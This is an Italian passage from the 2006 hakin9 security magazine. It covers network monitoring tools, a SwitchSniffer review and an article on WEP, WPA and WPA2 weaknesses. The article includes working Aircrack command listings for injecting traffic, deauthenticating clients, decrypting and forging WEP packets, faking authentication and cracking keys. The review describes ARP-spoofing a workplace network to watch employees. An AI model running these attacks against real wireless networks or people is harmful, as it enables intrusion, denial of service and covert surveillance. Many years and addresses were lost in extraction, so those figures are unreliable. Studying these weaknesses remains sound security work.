dalla barra degli strumenti e clicchiamo sul tasto destro per creare una nuova cartella. Se clicchiamo di nuovo sulla cartella con il tasto destro saremo in grado di modificare le proprietà dei controlli del monitor. Per prima cosa, inseriamo l'ip/hostname del nostro host (su cui vogliamo eseguire il controllo) e impostiamo l'opzione Error Threshold (Soglia di errore) pari a uno. Poi selezioniamo certificate authentication (autenticazione del certificato) nel parametro Logon credentials (Credenziali di accesso) per avere una connessione sicura. È anche necessario impostare Alert -> Settings (Avviso -> Impostazioni) sotto il campo Actions (Azioni) per definire la modalità in cui vogliamo essere informati quando accade qualcosa di sbagliato alla rete. Per ricevere gli avvisi tramite posta elettronica, è necessario deselezionare Send a SMS message to (Invia messaggio SMS a) e Send a network message to (Invia messaggio di rete a). A questo punto possiamo aggiungere delle regole. Facciamo doppio clic sulla cartella e poi sul tasto destro del mouse per impostare un'altra verifica. Se vogliamo rendere disponibile il nostro sito, dobbiamo selezionare l'opzione Check for availability only (Verifica solo la disponibilità). In questo modo abbiamo creato la nostra prima regola. Vogliamo anche conoscere se il processo Apache sia in esecuzione correttamente, è quindi necessario creare una nuova regola e selezionare Generic Secure Shell (SSH) Check (Controllo Secure Shell generico). Come potete vedere, il GFI Software ha già creato alcuni script. Selezionate lo script di verifica Apache e specificate il server/ip. Per vedere se il server FTP funziona correttamente, è necessario definire una regola secondo cui verrà eseguito un login completo al server FTP. Ripetete le stesse procedure di prima, ma questa volta selezionate FTP dall'elenco delle regole e abilitate l'opzione Use FTP site authentication (Utilizza autenticazione sito FTP). Non dimenticate di specificare come il Network server monitor dovrebbe eseguire il login. Poi impostate alcune regole per la macchina Windows Server Create una nuova cartella con le stesse impostazioni del sistema SUSE e modificate l'ip/hostname/logon credentials (credenziali di accesso) del server win. Modificatelo nella cartella win e create una nuova regola CPU Usage (Utilizzo della CPU). Impostate l'utilizzo massimo di CPU al 100%. Con un messaggio standard di errore obbligate il Network monitor a riavviare il server Win 2003 se raggiunge un utilizzo della CPU del 100%. Per fare ciò è necessario abilitare l'opzione Reboot the following computer (Riavviare il seguente computer) sotto le impostazioni Actions -> Reboot Computer / Restart Services (Azioni -> Riavvia Computer / Riavvia Servizi). Adesso è arrivato il momento di vedere se tutte le regole funzionano correttamente. Per questa operazione bisogna selezionare Monitoring Checks Status (Stato di controllo del monitoraggio) dalla barra degli strumenti. È bene sapere che le stesse informazioni sono anche disponibili attraverso un browser web Se i servizi sono avviati correttamente apparirà uno stato di Succeeded (Riuscito) nelle regole (altrimenti apparirà uno stato di Failed, ossia Non Riuscito). Se otterrete il secondo stato il GFI Network Monitor invierà un messaggio o potrebbe riavviare il sistema. Altri utili attributi: Come potete vedere quasi non ci sono limiti a quello che possiamo controllare o cosa dovrebbe fare il vostro server in caso di errore. Inoltre è anche possibile eseguire una ricerca DNS, abilitare la funzione whois per l'identificazione del client e eseguire richieste di traceroute. Se una macchina compatibile con SNMP è in esecuzione sulla rete lo strumento fornisce anche un controllo SNMP (SNMP Audit) e una funzione SNMP Walk. Un'altra bella caratteristica è che potete richiedere quali computer sono al momento presenti sul vostro dominio oltre a contare i processi di un dato sistema. Stefan Lochbihler 12 hakin9 Nº 2/2006

13 Strumenti SwitchSniffer Sistema operativo: Windows NT4/2000/XP/2003 Licenza: Freeware Destinazione: Monitoring di rete LAN Homepage: SwitchSniffer è uno strumento semplice e gratuito, destinato al monitoring delle reti di computer locali, dotato di meccanismi base per l'amministrazione e la rivelazione degli abusi. Partenza veloce: Da poco tempo svolgiamo le mansioni di amministratore di rete presso una piccola azienda. Il nostro presidente ci ha incaricati di rilevare quali dipendenti della ditta, invece di dedicare il tempo al lavoro, usano gli Internet communicator e le applicazioni peer-to-peer. Dato che la nostra postazione è basata sul sistema Windows, la rete aziendale basata sugli switch e il datore di lavoro non ha acquistato nessun altro strumento commerciale per il penetration test, abbiamo deciso di usare un'applicazione gratuita chiamata SwitchSniffer elaborata per lo sniffing nelle reti basate su switch. Per l'avvio del programma sono necessari i diritti di amministratore, senza di essi l'applicazione può comportarsi in modo instabile. Dopo il primo lancio ci appare la finestra delle opzioni. Nel sottomenù Network dobbiamo scegliere l'interfaccia di rete su cui andremo ad ascoltare. Vale la pena dare un'occhiata anche al sottomenù Spoof ed impostare Spoofing Types su <-> Gateway. In alcune reti può essere indispensabile per un corretto funzionamento dello sniffer. Il lavoro inizia con la scansione della rete locale (tasto Scan). Il programma la esegue in modo veloce rilevando tutti gli host attivi nella nostra sottorete. Essi verranno presentati sulla lista Local Hosts Info e sull'albero Up Hosts. Affinché l'analisi venga riferita a tutti gli host attivi, dobbiamo sviluppare l'albero e cliccare con il tasto destro del mouse su Select All. Dopo un paio di secondi possiamo premere il tasto Start il programma inizierà ad intercettare le informazioni dalla rete. Nel sottomenù Local Hosts Info otteniamo le informazioni sui computer della rete locale. SwitchSniffer svela inoltre: il sistema operativo, il nome del computer, l'indirizzo IP, l'indirizzo MAC ed il produttore della scheda di rete. Vengono mostrate anche le dimensioni dei pacchetti scaricati dalla rete, la velocità dello scarico e dell'invio. Con SwitchSniffer possiamo quindi monitorare anche il livello di utilizzo della rete da parte dei singoli dipendenti, ciò ci può suggerire chi si diverte invece di lavorare. Nel sottomenù Remote Hosts Info avremo le informazioni sugli host remoti. Mentre in Sessions Info troveremo le informazioni sulle sessioni correnti. I sottomenù della finestra a sinistra contengono rispettivamente: gli host locali (Local), l'albero degli host remoti (Remote) e l'albero degli servizi (Services). Ora, per realizzare l'incarico affidatoci dal nostro presidente, ci basta passare al sottomenù Services nella finestra sinistra del programma. Sulla lista vedremo i servizi (le porte tipiche per i commmunicator, per esempio jabber-client(5223)) e, dopo aver sviluppato l'albero di un servizio, vedremo gli host remoti con cui si connettono gli utenti, mentre sviluppando l'albero accanto all'indirizzo dell'host remoto vedremo gli host locali ovvero i colpevoli ricercati dal presidente. Altri utili atributi: il programma ci permette di bloccare le sessioni e le connessioni selezionate (con l'aiuto delle opzioni individuabili dopo aver cliccato il tasto destro del mouse). Quindi ci permette non solo di analizzare ma pure di amministrare certi servizi ammessi in rete (nel sottomenù Definitions possiamo definire quali servizi saranno ammessi, quali indirizzi MAC potranno usare la nostra rete e sfogliare le regole di filtro del traffico). Infine il programma ci facilita la rilevazione dell'arp Spoofing (sottomenù Detect and Alert nelle opzioni del programma). Difetti: il programma è meno sviluppato rispetto a dsniff o Ettercap. Ci potranno capitare dei problemi di stabilità (il programma continua ad essere reperibile solo in versione beta). Comunque lo strumento è molto più facile nell'uso rispetto altri programmi concorrenti un dato molto importante, sopratutto per un'amministratore principiante. Paweł Charnas Fig. 1: SwitchSniffer in azione hakin9 Nº 2/

14 Sicurezza Wi-Fi WEP, WPA e WPA2 Prima pagina Guillaume Lehembre Grado di difficoltà Il Wi-Fi (Wireless Fidelity) è una delle tecnologie wireless più importanti dei nostri giorni ed è sempre più presente nei nostri dispositivi: portatili, palmari e cellulari. Eppure c'è una aspetto relativo alla sua configurazione che viene spesso trascurato: la sicurezza. Analizziamo meglio la sicurezza dei metodi di crittografia usati nelle moderne apparecchiature Wi-Fi. Anche quando i dispositivi Wi-Fi hanno le misure di sicurezza attivate, viene spesso usato un protocollo di cifratura debole come il WEP. In questo articolo, esamineremo le debolezze del WEP e vedremo come è facile crackare il protocollo. La deplorevole inadeguatezza del WEP mette in evidenza la necessità di una nuova architettura di sicurezza come lo standard i, quindi analizzeremo da vicino anche i nuovi standard WPA e WPA2 insieme ai loro limiti e la loro integrazione nei sistemi operativi. In memoria del WEP Il WEP (Wired Equivalent Privacy) era il protocollo di cifratura predefinito del primo standard IEEE introdotto nel lontano Esso si basa su un algoritmo di cifratura RC4 con una chiave segreta di 40 bit o 104 bit combinata con un vettore d'inizializzazione (Initialisation Vector, IV) di 24 bit per cifrare il messaggio in chiaro M e il relativo checksum il cosiddetto valore di controllo dell'integrità (Integrity Check Value, ICV). Il messaggio cifrato C viene quindi prodotto con la seguente formula: C = [ M ICV(M) ] + [ RC4(K IV) ] dove è un operatore di concatenazione e + è un operatore XOR. Come possiamo vedere, il vettore d'inizializzazione IV è la chiave di sicurezza WEP, quindi per mantenere un livello decente di sicurezza e minimizzare la divulgazione, il vettore IV dovrebbe essere aumentato per ogni pacchetto in modo che i pacchetti successivi sono cifrati con chiavi diverse. Sfortunatamente in questo caso, il vettore IV è trasmesso in formato testo e lo standard non si occupa dell'aumento del vettore IV, lasciando questo metodo di sicurezza Dall'articolo imparerai... i limiti della crittografia WEP, una panoramica generale sullo standard i e le sue implementazioni commerciali: WPA e WPA2, i concetti base del 802.1x, le eventuali debolezze di WPA e WPA2. Cosa dovresti sapere... i concetti base dei protocolli TCP/IP e Wi-Fi, conoscenza base di crittografia. 14 hakin9 Nº 2/2006

15 Sicurezza WEP, WPA e WPA2 a particolari componenti di terminali wireless (punto d'accesso o scheda wireless). Breve storia del WEP Il protocollo WEP non era stato creato da esperti di sicurezza né da crittografi, quindi si rilevò subito vulnerabile ai problemi relativi all'algoritmo RC4 descritti da David Wagner quattro anni prima. Nel 2001, Scott Fluhrer, Itsik Mantin e Adi Shamir (FMS in breve) pubblicarono un famoso studio sul WEP, mostrandone le vulnerabilità in termini di RC4: la invariance weakness e gli attacchi a vettori IV conosciuti. Entrambi gli attacchi si basano sul fatto che i bit nei byte iniziali del keystream possono dipendere solo da alcuni bit della chiave di cifratura (anche se di solito ogni keystream ha il 50% delle possibilità di essere diverso dal flusso precedente). Dal momento che la chiave di cifratura è composta dalla concatenazione della chiave segreta e il IV, alcuni valori del vettore IV possono generare chiavi deboli. Le vulnerabilità vennero sfruttate da strumenti di sicurezza come Air- Snort che permettono alle chiavi WEP di essere recuperate analizzando una quantità sufficiente di traffico. Mentre questo tipo di attacco potrebbe essere eseguito con successo su una rete impegnata entro un intervallo di tempo ragionevole, il tempo richiesto per l'elaborazione dei dati è abbastanza lungo. David Hulton (h1kari) progettò una versione ottimizzata dell'attacco, prendendo in considerazione non solo i primi byte del RC4 (come nel modello FMS), ma anche i successivi byte. Questo portò ad una leggera riduzione dei dati richiesti per l'analisi. La fase di verifica dell'integrità soffre anche di gravi debolezze dovute all'algoritmo CRC32 usato per questo compito. CRC32 è usato di solito per la rilevazione di errori, ma non era mai stato considerato sicuro a livello crittografico a causa della sua linearità, come affermarono già Nikita Borisov, Ian Goldberg e David Wagner nel Da allora si ritiene che il WEP fornisce un livello di sicurezza accettabile solo per utenze domestiche e applicazioni non-cruciali. Tuttavia, Fig. 1: Protocollo di cifratura WEP anche questa utilità venne smentita con l'apparizione degli attacchi KoreK nel 2004 (attacchi FMS generalizzati che comprendono le ottimazione di h1kari), e l'attacco induttivo di Arbaugh che consente ai pacchetti arbitrari di essere decriptati senza conoscere la chiave attraverso il packet injection. Dei programmi per il cracking come Aircrack di Christophe Devine o WepLab di José Ignacio Sánchez implementano questi attacchi e possono recuperare una chiave WEP di 128 bit in meno di 10 minuti (o poco più, a secondo del punto accesso specifico e la scheda wireless). L'aggiunta di packet injection migliora notevolmente i tempi di cracking del WEP, richiedendo non milioni, ma solo migliaia di pacchetti con sufficienti IV unici circa per una chiave da 64 bit e per una chiave da 128 bit. Con il packet injection, raccogliere i dati necessari Tabella 1. Storia del WEP Data Settember 1995 Ottober 2000 May 2001 July 2001 August 2001 August 2001 February 2002 August 2004 July/August 2004 Descrizione Possibile vulnerabilità RC4 (Wagner) richiedeva una manciata di minuti. Al momento, WEP è quasi definitivamente morto (vedere Tabella 1) e non ne è consigliabile l'uso neanche con una chiave a rotazione. I limiti di sicurezza del WEP potrebbero essere riassunte come segue: debolezze dell'algoritmo RC4 del protocollo WEP a causa della costruzione della chiave, IV sono troppo brevi (24 bit meno di 5000 pacchetti richiesti per una probabilità del 50% di collisione) e riutilizzo di IV consentito (nessuna protezione contro le ripetizioni di messaggio), nessuna valida verifica di integrità (CRC32 è usato per la rilevazione degli errori e non è sicuro a livello crittografico a causa della sua linearità), nessun metodo integrato per l'aggiornamento delle chiavi. Primo studio sui limiti del WEP: Unsafe at any key size; An analysis of the WEP encapsulation (Walker) Un attacco induttivo in testo chiaro contro il WEP/WEP2 (Arbaugh) Attacco CRC di tipo bit flipping Intercepting Mobile Communications: The Insecurity of (Borisov, Goldberg, Wagner) Attacchi FMS Weaknesses in the Key Scheduling Algorithm of RC4 (Fluhrer, Mantin, Shamir) Uscita di AirSnort Attacchi FMS ottimizzati da h1kari Attacchi KoreK (IV unici) uscita di chopchop e chopper Uscita di Aircrack (Devine) e WepLab (Sanchez ) che implementa gli attacchi KoreK hakin9 Nº 2/

16 Prima Pagina Listing 1. Attivazione della modalità di monitoraggio # airmon.sh start ath0 Interface Chipset Driver ath0 Atheros madwifi (monitor mode enabled) Listing 2. Rilevazione di reti vicine e dei rispettivi client # airodump ath0 wep-crk 0 BSSID PWR Beacons # Data CH MB ENC ESSID 00:13:10:1F:9A: WEP hakin9demo BSSID STATION PWR Packets ESSID 00:13:10:1F:9A:72 00:0C:F1:19:77:5C 56 1 hakin9demo Il cracking della chiave WEP con Aircrack Il cracking del WEP può essere facilmente eseguito usando strumenti quali Aircrack (creato dal ricercatore francese Christophe Devine). Aircrack contiene tre utility principali, usate in tre fasi di attacco diverse per il recupero della chiave: airodump: per lo sniffing e la cattura delle reti provviste del WEP, aireplay: per il packet injection e aumento del traffico, aircrack: per il cracking di chiavi WEP attraverso la cattura di IV unici. Al momento aireplay supporta l'injection solo su determinati chipset wireless, mentre l'injection in modalità di monitoraggio (monitor mode) richiede i più moderni driver patchati. La modalità di monitoraggio è l'equivalente della modalità promiscua nelle reti wired, e evitano il rifiuto dei pacchetti che non sono intesi per l'host che monitora (che è spesso svolto nel livello fisico della pila OSI) e quindi consentendo ai pacchetti di essere catturati. Con i dirver patchati, è richiesta solo una scheda wirelss per catturare e aumentare il traffico allo stesso tempo. Lo scopo principale dell'attacco è di generare traffico e catturare i vettori IV unici usati tra un client legittimo e un punto d'accesso. Alcuni dati cifrati sono facilmente riconoscibili perché hanno una lunghezza fissa, un indirizzo di destinazione fisso, ecc. Questo è il caso dei pacchetti di richiesta ARP (vedere Riquadro Richieste ARP), che sono inviati all'indirizzo broadcast (FF:FF:FF:FF:FF:FF) e hanno una lunghezza fissa di 68 ottetti. Le richieste ARP possono essere ritrasmesse per generare nuove risposte ARP da un host legittimo, che risulta nello stesso messaggio wireless cifrato con i nuovi IV. Nei seguenti esempi, 00:13:10: 1F:9A:72 è l'indirizzo MAC del punto di accesso (BSSID) sul canale 1 con il SSID di hakin9demo e 00:09:5B: EB:C5:2B è l'indirizzo MAC del client wireless (usando WEP o WPA-PSK, a secondo dei casi). Per eseguire lo sniffing avremo bisogno dei privilegi di root. Il primo passo è attivare la modalità monitor sulla nostra scheda wireless (in questo caso un modello Atheros), quindi possiamo catturare tutto il traffico (vedere Listing 1). Il passo successivo è rilevare le reti vicine e i loro client controllando tutti i 14 canali che le reti Wi-Fi possono usare (vedere Listing 2). Il risultato nel Listing 2 è interpretato come segue: un punto di accesso con il BSSID 00:13:10:1F:9A: 72 usa la cifratura WEP sul canale 1 con il SSID hakin9demo e un client identificato dall'indirizzo MAC 00: 0C:F1:19:77:5C sono associati con questa rete wireless e autenticati. Una volta localizzata la rete di destinazione, è necessario iniziare la cattura sul canale corretto per evitare di mancare i pacchetti mentre Richieste ARP Il protocollo Address Resolution Protocol (ARP RFC826) è usato per tradurre un indirizzo IP di 32 bit in un indirizzo Ethernet di 48 bit (le reti Wi-Fi usano anche il protocollo Ethernet). Per illustrarlo meglio, prendiamo un host A ( ) che vuole comunicare con l'host B ( ), un indirizzo IP noto deve essere tradotto in un indirizzo MAC usando il protocollo ARP. Per farlo, l'host A invia un messaggio broadcast con l'indirizzo IP dell'host B (Who has ? Tell ). L'host di destinazione riconosce l'indirizzo IP nel pacchetto è uguale al suo e restituisce una risposta ( is at 01:23:45:67:89:0A). La risposta viene di solito memorizzata. si scansionano gli altri canali. Il seguente comando produce lo stesso output del comando precedente: # airodump ath0 wep-crk 1 Successivamente, possiamo usare le informazioni raccolte prima per aumentare il traffico con aireplay. L'injection inizierà quando ci appare nella rete wireless una richiesta ARP associata con il BSSID: # aireplay -3 \ -b 00:13:10:1F:9A:72 \ -h 00:0C:F1:19:77:5C \ -x 600 ath0 (...) Read 980 packets (got 16 ARP requests), sent 570 packets... Infine, aircrack viene usato anche per recuperare la chiave WEP. Attraverso il file pcap possiamo lanciare questo passo finale mentre airodump è ancora intento a catturare i dati (vedere Fig. 2 per i risultati): # aircrack -x -0 wep-crk.cap Altri tipi di attacchi con Aircrack Aircrack è in grado di lanciare anche altri tipi di attacchi molto interessanti. Analizziamone alcuni. 16 hakin9 Nº 2/2006

17 Sicurezza WEP, WPA e WPA2 Attacco 2: Deautenticazione Questo attacco può essere usato per recuperare un SSID nascosto (cioè che non è broadcast), catturare una handshake WPA a 4 vie o lanciare un attacco di tipo Denial of Service (ne parleremo in dettaglio più avanti, nella sezione sul i). Lo scopo dell'attacco è di obbligare il client a ri-autenticarsi che, insieme ad una mancata autenticazione per le trame di controllo (usati per l'autenticazione, associazione, ecc), consente all'aggressore di falsare gli indirizzi MAC. Un client wireless può essere deautenticato con il seguente comando facendo in modo che i pacchetti di deautenticazione siano inviati dal BSSID al client MAC falsificando il BSSID: # aireplay a 00:13:10:1F:9A:72 -c 00:0C:F1:19:77:5C ath0 La de-autenticazione di massa è altrettanto possibile (anche se non sempre affidabile) chiedendo all'aggressore di falsificare continuamente il BSSID e re-inviare il pacchetto di de-autenticazione all'indirizzo broadcast: # aireplay a 00:13:10:1F:9A:72 ath0 Attacco 3: Decriptare pacchetti WEP arbitrari senza conoscerne la chiave Questo attacco si basa su uno strumento proof-of-concept della KoreK detto chopchop che è in grado di decriptare i pacchetti WEP cifrati senza conoscerne la chiave. Il controllo di integrità implementato sul protocollo WEP permette ad un aggressore di modificare sia un pacchetto cifrato sia il CRC corrispondente. Inoltre, l'uso dell'operatore XOR nel protocollo WEP significa che il byte selezionato nel messaggio cifrato dipende sempre dallo stesso byte del messaggio in chiaro. Eliminando l'ultimo byte del messaggio cifrato genera una corruzione del messaggio ma permette anche di indovinare il valore del byte corrispondente in Fig. 2: Risultati di Aicrack dopo alcuni minuti formato testo e adeguare il messaggio cifrato. Se il pacchetto corretto è poi re-injected nella rete, esso verrà abbandonato dal punto di accesso se la previsioni sono sbagliate (in tal caso deve essere fatto una nuova previsione), ma per una previsione corretta verrà ritrasmesso come al solito. Ripetendo l'attacco per tutti i byte del messaggio si può decifrare un pacchetto WEP e recuperare il keystream. Tenente a mente che nel protocollo WEP l'incremento del vettore IV non è obbligatorio, è possibile riutilizzare questo keystream per falsare i pacchetti successivi (riutilizzando lo stesso IV). La scheda wireless deve essere passata in modalità di monitoraggio sul canale giusto (vedere l'esempio precedente per una descrizione su come fare). L'attacco deve essere lanciato contro un client legittimato (ancora 00:0C:F1:19:77:5C nel nostro caso) e aireplay dirà all'aggressore di accettare ogni pacchetto cifrato (vedere Listing 3). Vengono creati due file pcap: uno per il pacchetto decifrato e l'altro per il relativo keystream. Il file che ne risulta può essere letto attraverso un lettore adatto (useremo tcpdump) vedere Listing 4 per un ping di esempio scambiato tra due host. Una volta catturato il keystream è possibile falsare qualsiasi pacchetto. Di seguito vi presentiamo una richiesta ARP falsata inviata da (00:0C:F1:19:77:5C) a : # arpforge \ replay_dec xor \ 1 \ 00:13:10:1F:9A:72 \ 00:0C:F1:19:77:5C \ \ \ forge-arp.cap Infine, aireplay è usato per ritrasmettere questo pacchetto (vedere Listing 5). Questo metodo è meno automatico della falsificazione della richiesta ARP eseguita da Aircrack (l'opzione -1), ma è più scalabile l'aggressore può usare i keystream scoperti per alterare qualsiasi pacchetto che non appartiene più al keystream (altrimenti è necessario espandere il keystream). Attacco 4: Falsa autenticazione Il metodo per cracker la chiave WEP appena descritto (Attacchi 1 e 3) richiedono un client legittimo (reale o virtuale, anche se reale è preferibile) che sia associato ad un punto d'accesso affinché il punto d'accesso non rifluiti i pacchetti a causa di un indirizzo di destinazione non associato. Se viene usata un'autenticazione aperta, qualsiasi client può essere autenticato e associato con un punto di accesso, ma il punto di accesso ri- hakin9 Nº 2/

18 Prima Pagina Listing 3. Decriptare pacchetti WEP senza conoscere la chiave # aireplay -4 -h 00:0C:F1:19:77:5C ath0 Read 413 packets... Size: 124, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:13:10:1F:9A:72 Dest. MAC = 00:13:10:1F:9A:70 Source MAC = 00:0C:F1:19:77:5C 0x0000: 0841 d f 9a72 000c f c.A...r...w\ 0x0010: f 9a70 c040 c3ec e100 b1e1 062c...p.@..., 0x0020: 5cf c89 68a0 23f5 0b47 5abd 5b76 \.'...h.#..gz.[v 0x0030: c8 adfe bf30 d98c bf 536c.x hV.Sl 0x0040: fd2 d44b c6a0 a3e2 6ae b4 pf_..k...j.4wt. 0x0050: fb13 c1ad b8b8 e a 55c2 ea9f 5be6...5#.U...[. 0x0060: 862b 3ec1 5b1a a1a7 223b d1 e6e1.+>.[...";.d7... 0x0070: 3b88 c5b bff 5160 ;...C...Q` Use this packet? y Saving chosen packet in replay_src cap Offset 123 ( 0% done) xor = 07 pt = frames written in 1120ms Offset 122 ( 1% done) xor = 7D pt = 2C 671 frames written in 2013ms (...) Offset 35 (97% done) xor = 83 pt = frames written in 2072ms Offset 34 (98% done) xor = 2F pt = frames written in 2076ms Saving plaintext in replay_dec cap Saving keystream in replay_dec xor Completed in 183s (0.47 bytes/s) Listing 4. Lettura di un file pcap # tcpdump -s 0 -n -e -r replay_dec cap reading from file replay_dec cap, link-type IEEE802_11 (802.11) 11:40: BSSID:00:13:10:1f:9a:72 SA:00:0c:f1:19:77:5c DA:00:13:10:1f: 9a:70 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype IPv4 (0x0800): > : ICMP echo request, id 23046, seq 1, length 64 Listing 5. Ritrasmissione di un pacchetto alterato # aireplay -2 -r forge-arp.cap ath0 Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:13:10:1F:9A:72 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:0C:F1:19:77:5C 0x0000: f 9a72 000c f c.A...r...w\ 0x0010: ffff ffff ffff 8001 c3ec e100 b1e1 062c..., 0x0020: 5cf f4 25f1 4b46 1ab0 199c \.'.I.`.%.KF... 0x0030: b78c f2d bdce d18c 8d33 cc11 510a..S.o Q. 0x0040: 49b7 52da I.R. Use this packet? y Saving chosen packet in replay_src cap You must also start airodump to capture replies. Sent 1029 packets... Listing 6. Falsa autenticazione # aireplay e hakin9demo -a 00:13:10:1F:9A:72 -h 0:1:2:3:4:5 ath0 18:30:00 Sending Authentication Request 18:30:00 Authentication successful 18:30:00 Sending Association Request 18:30:00 Association successful fiuterà ogni pacchetto non cifrato con la chiave WEP giusta. Nell'esempio del Listing 6, Aireplay è usato per falsificare un'autenticazione e un'associazione per il SSID hakin9demo (BSSID: 00:13:10:1F:9A:72) con l'indirizzo MAC falsato 0:1:2:3:4:5. Alcuni punti di accesso richiedono ai client di riassociarsi ogni 30 secondi. Questo comportamento può essere imitato in aireplay sostituendo la seconda opzione (0) con i Nel gennaio del 2001, nell'ambito dell'ieee venne creato un task group i per migliorare l'autenticazione dei dati e la sicurezza crittografica. Nell'aprile del 2003, la Wi-Fi Alliance (un'associazione per la promozione e la certificazione Wi-Fi) distribuì una raccomandazione per rispondere alle preoccupazioni delle aziende in merito alla sicurezza wireless. Tuttavia, erano anche consapevoli del fatto che i clienti non avrebbero sostituito la loro attrezzatura tanto facilmente. Nel giugno del 2004, venne adottato lo standard i e ricette il nome commerciale di WPA2 dalla Wi-Fi Alliance stessa. Lo standard IEEE i introdusse cambiamenti fondamentali come la separazione tra l'autenticazione dell'utente dalla segretezza e l'integrità del messaggio, fornendo una architettura di sicurezza robusta e scalabile adatta sia per le reti domestiche sia per grossi sistemi aziendali. La nuova architettura per le reti wireless è nominata Robust Security Network (RSN) e utilizza l'autenticazione 802.1X, una distribuzione della chiave robusta e nuovi meccanismi di segretezza e integrità dei dati. Anche se l'architettura RSN è molto complessa, essa fornisce delle soluzioni sicure e scalabili per le comunicazioni wireless. Un RSN normalmente accetta solo dispositivi RSN, ma IEEE i definisce anche un'architettura Transitional Security Network (TSN) in cui possono partecipare sia RSN sia i sistemi WEP, consentendo anche agli utenti di aggiornare i loro strumenti. Se le procedure di autenticazione o di associazione usate tra le sta- 18 hakin9 Nº 2/2006

19 Sicurezza WEP, WPA e WPA2 IEEE 802.1X e EAP Il protocollo di autenticazione IEEE 802.1X (noto anche come Port-Based Network Access Control) è una framework sviluppata in origine per le reti wired che fornisce meccanismi di autenticazione, di autorizzazione e di distribuzione chiave, e implementano il controllo sull'accesso per utenti che entrano nella rete. L'architettura IEEE 802.1X si compone di tre entità principali: il supplicant che entra nella rete, l'autenticatore che fornisce il controllo sugli accessi, il server di autenticazione che esegue le autorizzazioni. Nelle reti wireless, il punto di accesso funge da autenticatore. Ogni porta fisica (porta virtuale nelle reti wireless) si divide in due porte logiche che compongono il PAE (Port Access Entity). L'autenticazione del PAE è sempre aperta e permette di far passare i le trame di autenticazione mentre il servizio PAE viene aperto solo in seguito ad una autenticazione andata a buon fine (come in uno stato autorizzato) per un certo periodo di tempo (3600 secondi di default). La decisione di permettere l'accesso è eseguita di solito dalla terza entità, cioè il server di autenticazione (che può essere un server Radius dedicato o per esempio nel caso di reti domestiche un processo che gira su un punto di accesso). La Fig. 3 illustra come queste tre entità comunicano tra loro. Lo standard i esegue piccole modifiche al IEEE 802.1X per le reti wireless per far fronte alla possibilità di furto di identità. L'autenticazione del messaggio deve essere incorporato affinché sia il supplicant sia l'autenticatore calcolino le chiavi segrete e permettono la cifratura prima di accedere alla rete. Il supplicant e l'autenticatore comunicano usando un protocollo EAP. Come potete notare, il ruolo dell'autenticatore è essenzialmente passivo potrebbe semplicemente inoltrare tutti i messaggi al server di autenticazione. EAP è una framework per il trasporto di diversi metodi di autenticazione, accettando solo un numero limitato di messaggi (Request, Response, Success, Failure), mentre gli altri messaggi intermediari dipendono dal metodo di autenticazione scelto: EAP-TLS, EAP-TTLS, PEAP, Kerberos V5, EAP-SIM ecc. Quando l'intero processo è completato (a causa del gran numero di possibili metodi non ci addentreremo nei dettagli), entrambe le entità (cioè il supplicant e il server di autenticazione) hanno una chiave principale segreta. La comunicazione tra l'autenticatore e il server di autenticazione procede utilizzando il protocollo EAPOL (EAP Over LAN), usato nelle reti wireless per il trasporto di dati EAP con i protocolli di livello superiore come Radius. zioni utilizza una handshake a 4 vie, l'associazione è detta RSNA (Robust Security Network Association). Per stabilire una comunicazione è necessario avere quattro fasi (vedere Fig. 4): pubblicizzate su Beacon o in un messaggio Probe Respond (seguendo un Probe Request dal client). Ne segue un'autenticazione aperta standard (proprio come nelle reti TSN, dove l'autenticazione è sempre a buon fine). La risposta del client viene incluso nel messaggio di tipo Association Request confermato dalla risposta Association Response dal punto di accesso. Le informazioni sulla politica di sicurezza è inviata nel campo RSN IE (Information Element) con i dettagli su: metodi di autenticazione supportati (802.1X, Chiave segrete precondivisa (PSK)), protocolli di sicurezza per traffico unicast (CCMP, TKIP ecc.) la pairwise cipher suite, protocolli di sicurezza per il traffico multicast (CCMP, TKIP etc.) il group cipher suite, supporto per la pre-autenticazione, permettendo agli utenti di pre-autenticarsi prima di passare ad un nuovo punto di accesso della stessa rete per un passaggio senza interruzioni. La Fig. 5 raffigura la prima fase. Fase 2: autenticazione 802.1X La seconda fase è l'autenticazione 802.1X basata sul EAP e il metodo di autenticazione concordato in precedenza: EAP/TLS con certificati client e server (che richiedono una infrastruttura per chiave pubblica), EAP/ TTLS o PEAP per l'autenticazione ibrida (con certificato richiesti solo per i server) ecc. L'autenticazione 802.1X viene iniziata quando il punto di accesso richiede i dati di identità del client, con la risposta del client contenente il metodo di autenticazione scelto. I messaggi adatti sono poi scambiati tra il client e il server accordo sulla politica di sicurezza, autenticazione 802.1X, derivazione e distribuzione di chiave, segretezza e integrità dei dati RSNA. Fase 1: Accordo sulla politica di sicurezza La prima fase richiede alle parti coinvolte nella comunicazione di stabilire un accordo sulla politica di sicurezza da adottare. Le politiche di sicurezza supportate dal punto di accesso sono Fig. 3: Modello IEEE 802.1X dalla specifica IEEE 802.1X hakin9 Nº 2/

20 Prima Pagina La PMK stessa non è mai usata per il controllo di cifratura o integrità. Invece, è usato per generare una chiave di cifratura temporanea per il traffico unicast si tratta di una PTK (Pairwise Transient Key). La lunghezza della PTK dipende dal protocollo di cifratura: 512 bit per TKIP e 384 bit per CCMP. La PTK consiste di diverse chiavi temporanee: Fig. 4: Le fasi operative del i di autenticazione per generare una chiave maestra comune (MK). Alla fine della procedura, un messaggio Radius Accept è inviato dal server di autenticazione al punto di accesso che contiene la MK e il messaggio EAP Success per il client. La Fig. 6 rappresenta questa seconda fase. Fase 3: Distribuzione e gerarchia di chiave La sicurezza nelle connessioni dipende molto dalle chiavi segrete. Nel RSN, ogni chiave ha una vita limitata e la sicurezza generale è garantita da un'insieme di diverse chiavi, organizzate in una gerarchia. Quando viene stabilito un contesto di sicurezza dopo una autenticazione andata a buon fine, le chiavi temporanee (di sessione) vengono create e aggiornate regolarmente fino a quando il contesto di sicurezza non viene chiuso. La generazione e lo scambio delle chiavi sono affidati alla terza fase. Si hanno due handshake durante le derivazione delle chiavi (vedere Fig. 7): PSK viene generata dalla passphrase (da 8 a 63 caratteri) o una stringa di 256 bit e fornisce una soluzione per le reti domestiche e di piccole imprese che non hanno un server di autenticazione, se viene usato un server di autenticazione, la PMK è derivata dall'autenticazione 802.1X MK. Fig. 5: Fase 1: Accordo sulla politica di sicurezza KCK (Key Confirmation Key 128 bit): Chiave per i messaggi di autenticazione (MIC) 